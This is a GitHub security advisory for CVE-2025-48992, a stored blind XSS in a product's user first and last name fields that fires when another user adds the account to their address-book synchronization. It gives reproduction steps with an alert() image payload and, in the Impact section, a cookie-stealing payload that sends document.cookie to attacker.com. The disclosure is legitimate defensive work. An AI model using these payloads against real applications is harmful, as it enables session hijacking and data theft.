Skip to content

Blind XSS using user's First and Last names field executed on Synchronizaion's Address books

High
mschering published GHSA-j35g-q5mc-jwgp Jun 16, 2025

Package

No package listed

Affected versions

<=6.8.120, 25.0.23

Patched versions

>=25.0.27, 6.8.123

Description

Summary

A stored and blind XSS vulnerability exists in the Name Field of the user profile. A malicious attacker can change their name to a javascript payload, this payload is then executed when a user add the malicious user to thier Synchronization > Address books

Vulnerability Type

  • Stored Cross-Site Scripting (XSS)
  • Blind XSS

Steps to Reproduce (PoC)

  1. Login as Admin

    • Navigate to System Settings > Users.
    • Add two users: user1 (User One) and user2 (User Two) using the +Add button.
  2. Inject XSS Payload

    • Logout from admin and login as user1.
    • Go to My Account > Profile > Name.
    • Set First name: <img src=1 onerror=alert(1)>
    • Click Save
  3. Trigger Blind XSS

    • Logout and login as user2.
    • Navigate to the My account > Synchronization > Address books > +Add.
    • Select user1 (i,e : <img src=1 onerror=alert(1)> One)
    • Click Ok then Save
    • The stored XSS payload is executed automatically.

Impact

  • Unauthorized Fetch Requests
    Using <img onerror> or other techniques, an attacker can send background requests from the user’s browser to external domains or internal endpoints.

  • Data Theft / Session Hijacking / Account Manipulation
    With a more advanced payload, an attacker could exfiltrate session data or perform actions on behalf of users.
    If there is no valid csrf protection malicious actor can inject something like:
    <img src=x onerror="new Image().src='http://attacker.com?c='+document.cookie">. Thus, a user's session can be compromised.

Recommendation

Sanitize input on all fields, especially those rendered to other users. Escape or encode HTML entities before rendering.

Severity

High

CVE ID

CVE-2025-48992

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

Improper Neutralization of Alternate XSS Syntax

The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax. Learn more on MITRE.

Credits